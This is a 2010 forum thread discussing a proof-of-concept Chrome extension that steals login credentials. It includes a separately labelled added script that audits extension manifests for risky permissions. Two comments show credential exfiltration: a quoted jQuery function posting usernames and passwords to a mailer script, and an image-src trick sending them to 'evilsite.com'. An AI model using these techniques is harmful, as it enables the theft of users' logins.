sciguyaj Jul 10, 2010
Hackers always find a way.
moduc Jul 11, 2010
What a F*U article. How could things like this be in the news in the first place? Plugins of course have been able to do things like this for ages. What's so special about it? Capture a form? Send an email? Capture a form and send an email? Plugin can have higher privilege than a normal page. Some have the same right as your local app. So, people need to treat plugins as programs they download. It has to have high quality and trusted.
theymos Jul 11, 2010
Running random code on my computer might compromise my security??? I'm shocked!
mostballernous Jul 10, 2010
I had to reinstall recently due to drive failure and was just about to go hunting for plugins. Even though I (usually) know better than to go installing plugins that I don't personally verify as safe, this is a good reminder!
doshindude Jul 10, 2010
....the only plugin you ever need to install after an OS rebuild is Flash.
npsken Jul 11, 2010
Lastpass, Xmarks (does more than the built in Chrome Sync), Chrome Sniffer, Gmail Notifier, Sexy Undo Close Tab and other plugins for special tasks (depending on the person).
There... I just proved you wrong.
tyg10 Jul 10, 2010
I REALLY detest these people....!!!!
penelern Jul 10, 2010
Why? Shouldn't be someone that tests and finds bugs in application so we can have better security? Looks like Google staff didn't find this bug...it's good that we know about it... I do not think all hackers are bad...actually the crackers and script kiddies are bad but hackers is something else...
axcess99 Jul 10, 2010
Not a bug, not a security hole, just a blatantly obvious malicious trojan extension using functionality similar to what LastPass https://chrome.google.com/extensions/detail/hdokiejnpimakedhajhdlcegeplioahd does.
The author doesn't say what message chrome displays prior to installation e.g. "This extensions want access to: Your data on all web sites, Your browsing history".
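Added example, not part of the original thread and not code from the blog post or from Chrome: the install-time warning quoted above is driven by what the extension's manifest declares, so a manifest can be audited before installing. The sample manifest, the finding ids and the assumption that `tabs`/`history` map to the "browsing history" warning are constructed for illustration.

```javascript
'use strict';
// Added example: flag the manifest grants behind Chrome's install-time warnings.

// Match patterns that cover every site.
const ALL_SITES = new Set(['<all_urls>', '*://*/*', 'http://*/*', 'https://*/*']);
// Assumption: these API permissions produce the "browsing history" warning.
const HISTORY_PERMS = new Set(['tabs', 'history']);

// True for host match patterns such as "https://example.com/*".
function isHostPattern(p) {
  return p === '<all_urls>' || /^(\*|https?|ftp|file):\/\//.test(p);
}

// Returns one finding { id, evidence } per risky grant found in the manifest.
function auditManifest(manifest) {
  const declared = [
    ...(manifest.permissions || []),
    ...(manifest.host_permissions || []),
  ].filter((p) => typeof p === 'string');
  const findings = [];

  // Host access to every site: "Your data on all web sites".
  const broad = declared.filter((p) => ALL_SITES.has(p));
  if (broad.length) findings.push({ id: 'all-sites-host-access', evidence: broad });

  // Tab/history APIs: "Your browsing history".
  const history = declared.filter((p) => HISTORY_PERMS.has(p));
  if (history.length) findings.push({ id: 'browsing-history', evidence: history });

  // Named hosts the extension may contact cross-origin; review each one.
  const named = declared.filter((p) => isHostPattern(p) && !ALL_SITES.has(p));
  if (named.length) findings.push({ id: 'cross-origin-hosts', evidence: named });

  // Content scripts injected everywhere can read any page's DOM, forms included.
  for (const cs of manifest.content_scripts || []) {
    const wide = (cs.matches || []).filter((m) => ALL_SITES.has(m));
    if (wide.length) {
      findings.push({ id: 'content-script-on-all-sites', evidence: wide });
    }
  }
  return findings;
}

// Constructed sample manifest (not the one from the article).
const sampleManifest = {
  name: 'Weather helper (constructed sample)',
  version: '1.0',
  permissions: ['tabs', 'http://*/*', 'https://*/*', 'http://mailer.example/*'],
  content_scripts: [{ matches: ['<all_urls>'], js: ['jquery.js', 'content.js'] }],
};

console.log(JSON.stringify(auditManifest(sampleManifest), null, 2));
```

An extension whose stated purpose needs one site should produce only a short `cross-origin-hosts` finding; anything that also reports all-sites access deserves a look at its scripts before it is installed.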
cron186 Jul 11, 2010
I would not call this a bug. This is not an exploitable flaw unless you download a malicious add-on which is why pretty much every browser (including chrome) makes you go through a dialog box asking you if you trust the plugin. Are we at the point where we need to have signed plugins... maybe, but your local information is available to plugins because it is code that is running locally on your machine. I would call this a security flaw due to people's lax attitude towards privacy/security not a bug.
dreasgrech Jul 10, 2010
I'm the author of the plugin.
The reason I wrote the post is because people should be more aware of the plugins they install, rather than just blatantly installing everything they find. I'm not trying to hack people or steal login credentials; in fact, I did not upload it to Google's repository of extensions.
The content of the post is there to show that these things can actually happen, whether you like them or not.
axcess99 Jul 10, 2010
Two questions for the author:
Why does it not require the cross-origin permission for the malicious-mailer-script domain (http://code.google.com/chrome/extensions/xhr.html#requesting-permission) or was that an accidental omission from the manifest file?
Why does your post not mention the warning message displayed when installing the extension?
"This extensions want access to: Your data on all web sites, Your browsing history". Doesn't really sound like a security bug/flaw as much as dumb users not reading or caring about what they are doing.
xpose Jul 10, 2010
Nice job writing the plugin. Should be interesting to see Google's response.
bdfariello Jul 10, 2010
I was actually going to install it and login with a thank you message, but now I can just say it here. Keep up the good work, Ethical Hacker.
breadfred Jul 10, 2010
If I understand this correctly, when you install your plugin, the browser will warn you. If you ignore the warning, it will store passwords and user names. What we need is a program that stops ignorant people using the internet.
alo81 Jul 11, 2010
I'm curious, what do you do with their information?
amazingandrex Jul 11, 2010
For the record, Plugins != Extensions. Title is misleading.
samurimaster Jul 10, 2010
Then you must not understand how exploits are found/reported/revealed/etc
7m7uf Jul 11, 2010
I love these people! They not only find holes, but share them with the developer forcing them to act, and the end result, hopefully, is safer software. Would you rather that hole be out there for someone else to find? Someone that would use it in a not-so-nice fashion?
Be grateful one of the good guys found it.
axcess99 Jul 10, 2010
Here are the
direct linking digg story http://new.digg.com/story/Andreas_Grech_s_Blog_Stealing_login_details_with_a_Google_C
direct link http://blog.dreasgrech.com/2010/07/stealing-login-details-with-google.html
drhuntzzz Jul 10, 2010
Link: http://www.chromeextensions.org/utilities/ie-tab/
themazzter Jul 11, 2010
At first I thought you were trolling, then I got the joke*. I need sleep.
* - IE trashes Chrome's security lol.
Closed Account Jul 10, 2010
Where is your God now?
esb82 Jul 11, 2010
http://www.authorama.com/fables-16.html
esb82 Jul 11, 2010
I assume (the lack of replies leaves me no choice) that I'm getting buried because, superficially, this fable appears to support theism. Look again, diggers. I'm an atheist, btw.
seltaeb4 Jul 10, 2010
You've been Chrom'd.
skelooth Jul 10, 2010
This is possible in any browser that supports javascript based plugins. This actually isn't even all that "clever", this is script kiddie stuff. Write something that gives access to a subshell and maybe you can have some 'street cred'.
displaylist Jul 11, 2010
The term is "plug-in".
zarcu Jul 10, 2010
Plug that "whole" google!
breadfred Jul 10, 2010
It is not a google whole. The author chose google as it is perceived as a safe platform. This is more a social exploit than a technical one - users will have to grant the program access!
Closed Account Jul 11, 2010
Should they plug the whole hole? Or is it just a holy whole? The whole world must know of this hole.
truejournals Jul 10, 2010
I almost dugg this, but this is just plain bogus news.
1. The hacker did not create a plugin, it's an extension. There's a difference.
2. It's a ridiculously simple extension that, as pointed out by skelooth is "script kiddie stuff". Before installing an extension, you should look through reviews, and see what it does. Bad reviews? Don't install it! This is why you should install extensions only from Google's "repository" at https://chrome.google.com/extensions?hl=en-US I've gotta think that an extension that does this would be quickly deleted.
3. This is like saying Firefox has a huge security whole because you can install a greasemonkey script that does the same thing.
Overall, this is not only inaccurate, but just plain non-news.
reziarfg Jul 11, 2010
Point is, maybe it can both do something useful, to make you unaware of its malicious functions.
Then the reviews would read something like "Great extension for checking weather!" but in the background it's stealing your login credentials.
Then Google might not go through the extensions with a fine tooth comb and miss the malicious part.
themazzter Jul 11, 2010
Yeah I can't understand how this made front page of /. earlier. The extension warns you what permissions the extension is requesting when you install it.
Firefox and IE don't even do that, Chrome is still the most secure out of them.
Closed Account Jul 11, 2010
Sure, next you're going to say I shouldn't install random programs I get in unsolicited emails.
What do I look like, a programologist?!
archcoder Jul 10, 2010
"Google can plug the whole"
This upsets me more than the vulnerability.
magzine Jul 11, 2010
Good hackers/programmers generally write better code than English.
I see no problem.
atario Jul 11, 2010
But can they accidentally the whole?
b3n87 Jul 11, 2010
hole?
shadowspawn Jul 11, 2010
Dude, you can do this with ffx.
Fact is, and this is just a scare-tactic article to get hits, don't install plugins from sources you don't trust. And most plugs should be open source anyway, so you can trust on the public to find problems with them.
Oh yea, like you'd install XXX-FREE!!!-China-Porn-LIVE0From-Russa.xpi
C'mon now.
themazzter Jul 11, 2010
It's even easier in FF since extensions are given free rein of the computer (well the browser, but there are legitimate ways to break out AFAIK) without the user having to consent like in Chrome.
crazyjoe123 Jul 11, 2010
Just like that FF add-on that runs a .exe to help prevent memory leaks. FF add-ons can pretty much do anything.
Closed Account Jul 11, 2010
Oh comeon, I just installed that extension and it's simply amaz
displaylist Jul 11, 2010
if this dude WERE slick
Closed Account Jul 11, 2010
======== http://www.xolook.com/ ========
"Hello, you need not worry, can see came to see! We cannot demand of you to buy, just want to let you enjoy our new Jordan" Engrish at its finest.
aualin Jul 11, 2010
I find this funny, considering you all believe a feature to be a bug. It's a feature to be able to read and write to the DOM of any open page in your browser. When you install an extension you actually get a big fat warning that this is the case, how can this then be newsworthy enough to get on the Digg frontpage when everyone who has installed an extension in either Chrome, or Firefox, has had a huge f**king popup smash his face.
soopafly Jul 11, 2010
Haha. Take that Apple!! Oh wait. This is about Google? I'm sure it was intentional.
zzzblaz Jul 11, 2010
Crappy article is... crappy.
ptfoe Jul 11, 2010
FF FTW
myztry Jul 11, 2010
The whole plugin architecture needs to be re-thought. Few types are as lame and dangerous as Microsoft's knee-jerk reaction to Java known as Active-X but now that they have settled in, it needs to be done right.
1. Have the IEEE (or similar body) build a virtual non-privileged JIT compatible instruction set as a standard. This should be implemented by whichever OS as allowing applications to create executable code is just plain moronic and defeats the whole purpose of things like DEP (Data Execution Prevention) by requiring exemptions. This shall not include any API definitions.
2. Have the ISO (or similar body) define a standard/"exec.library" that defines core language API that covers the basics such as memory allocation, string handling and other low level sub-OS type API. This too shall be implemented by the OS so as to align to the paradigm in use (OO, realtime, embedded, etc).
3. Have the W3C (or similar body) define a browser level API. This shall be implemented solely by the browser or relevant system. The browser system will achieve JIT compilation for fast and efficient plug-in architecture by requesting the underlying OS to compile the byte code against the relevant API and nothing else. The resulting code shall never have more privilege than the application that requested it to be compiled. Even platform dependent applications could be compiled on any architecture as long as the API (or part thereof) was implemented.
Frankly, Flash, .NET, Java, etc. all need to go and be replaced by something defined by an open standards body that assigns the roles to the appropriate systems. Otherwise it's all going to remain in the insecure incompatible mess that it is currently in.
bloodwine Jul 11, 2010
the best thing about standards is how many revisions there are to choose from, and gray areas left for interpretation.
I'm not saying that standards are bad, but they are no silver bullet and are no guarantee.
myztry Jul 11, 2010
There are no guarantees in life full stop. What is your point?
bloodwine Jul 11, 2010
my point is that I have worked with many different types of standards, and while they help, they still have lots of issues. Specifically, I do a lot of work dealing with HL7. Talk about a horrible standard.
cesclaveria Jul 11, 2010
Ok, all of that is great and all but it is not that relevant in this case. The extension discussed in the article never asked for more permissions and never was compiled, it was just some javascript reading values on a form.
myztry Jul 11, 2010
It is relevant because it's not working. Scripting is inefficient and unable to be pre-evaluated. Really it is just a tentative work around trying to fit into the text based world of HTML (even though things such as 7bit data transfers that resulted in things like UUE are no longer relevant).
HTML is really a document description language. It's not a programming language. The two should not be combined except at the time that was the easiest even if not the best solution. Time to get serious about it. The web is a big thing now.
displaylist Jul 11, 2010
Plug-in. The term is "plug-in".
skelooth Jul 11, 2010
I wish I could bury a million times.
skelooth Jul 11, 2010
That would never work. Design by committee is a pipe dream, and takes power away from the developers to do it right.
esc27 Jul 12, 2010
Except, 50 years later when those standards are finally ratified we are using something else.
johnnysoftware Jul 29, 2010
I agree with part of what you are saying. I disagree with other parts. For one thing, a standards body does not necessarily hammer out a design that will wind up resulting in secure implementations. In fact, that has failed to happen in a bunch of cases.
Look at image reading/rendering software built into most operating systems, which in turn is used by web browsers and a ton of other applications on that computer. In the past decade, we have had a number of security flaws exist and in cases even be exploited: JPEG, etc.
These file specs and even algorithms are totally defined by standards bodies. And yet, OS makers get them wrong.
I do think image rendering codecs should be open sourced so that we do not have these problems continue. The same goes for HTML renderers, JavaScript interpreters. And anything near as ubiquitous as Flash which has a track record of being exploited so much should be open sourced or better yet broken up into manageable pieces. Apparently, Flash is too big right now for the company to find the bugs in it. Microsoft has more problems than everyone else finding bugs in IE too, possibly for the same reasons.
stealthspc Jul 11, 2010
This is a retarded hack. Chrome is designed to give extension developers this much access. This is why it prompts you when you decide to download an extension. It's like an application on your computer stealing your password you type into it. Not a security problem.
jqp123 Jul 11, 2010
For years, people trashed the ActiveX concept in IE ... and then others re-created it.
Labeling it a feature instead of a bug never really worked for MS ... why should it work for Google now?
Closed Account Jul 11, 2010
I DONT RUN PLUGINS BECAUSE IT'S FASTER!
Closed Account Jul 11, 2010
Hacker creates virus where DIGG becomes overrun by evolution deniers and creationists. Some opinions are so stupid they don't need an outlet, but Digg has become a place for those people to come to. f**k it. I'm out. I'll miss you, digg, but not that much, here's my farewell letter:
http://digg.com/arts_culture/Peace_out_Digg_I_m_going_to_miss_you
iamacyborg Jul 11, 2010
This code wouldn't work, because AJAX calls are only allowed within the same domain. The only way this could possibly work is if the domain that you're stealing the password from also has a form for sending e-mails to an arbitrary address, which is pretty god damn unlikely.
    sendEmail = function(username, password, url, callback) {
        var msg = getMessage(username, password, url);
        $.ajax({
            type: 'POST',
            url: 'the url of the mailer script', //Change to the path of your mailer script
            data: 'the headers you want to send', //Change to add any headers to be sent along
            success: callback
        });
    }
memy Jul 11, 2010
That's not entirely true. Cross-domain POST requests work, within some limits:
- The remote server has to respond properly to an OPTIONS request, explicitly allowing the remote origin to POST. This is done at the bad guy's server, so no problem;
- You can't read the remote server's reply to the POST request. The callback never gets called, even though the request gets completed.
Despite those limitations, it is certainly possible to steal passwords that way, considering that the request's reply is irrelevant in this case (at that point, the password has already been sent).
Of course, one could make things simpler by creating an image object and setting its src to evilsite.com/mail.php?username=[username]&password=[password], avoiding this jQuery mess altogether.
displaylist Jul 11, 2010
The term is "plug-in", not "plugin." Hyphens aren't that hard. Use them.
buckrogers1965 Jul 11, 2010
No, it's-not.
skelooth Jul 11, 2010
Maybe you want to go to Mozilla and tell them to fix their typos? https://addons.mozilla.org/en-US/firefox/browse/type:7 Because they have it spelled plugins all over the website.
ronnisr Jul 11, 2010
Lame article. Any program or OS for that matter can open doorways if you allow it by installing s**t like this. Plain stupid!
k3nt0456 Jul 11, 2010
... Wait extensions can do calls to arbitrary domains? What could possibly go wrong
ferrisnox Jul 11, 2010
Vote for Opera, doesn't need plugins for speeddial, mouse gestures, syncing, voice, notes, pretty much all of the useful things there are plugins for. Security out of the box.
nicko68 Jul 12, 2010
Switched back to Opera recently, I love it.
schneidz101 Jul 11, 2010
fta:
"be extra careful when you install any Chrome plugin"
this implies that firefox/ ie are insusceptible to this type of flaw; i doubt that is the case.
wtfheadexplody Jul 11, 2010
In other news the Chrome Browser allows you to respond to emails from Nigerian scams! Chrome is obviously responsible for the millions of dollars lost to online scams, and not the end-user. Obviously, another failure in the security of the Chrome browser.
lakeeffect Jul 11, 2010
Hint: It wasn't adobe.
astrotrain Jul 12, 2010
This is why I stick to my Mozilla guns...Chrome may be faster than Firefox...but it looks like it's not as secure..especially when it comes to plugins.
geohac Jul 13, 2010
This isn't surprising, since it already happened to firefox.
nazroot Jul 23, 2010
Come on man..
spacebuddy Jul 29, 2010
Another reason to keep away from Chrome and FireFox.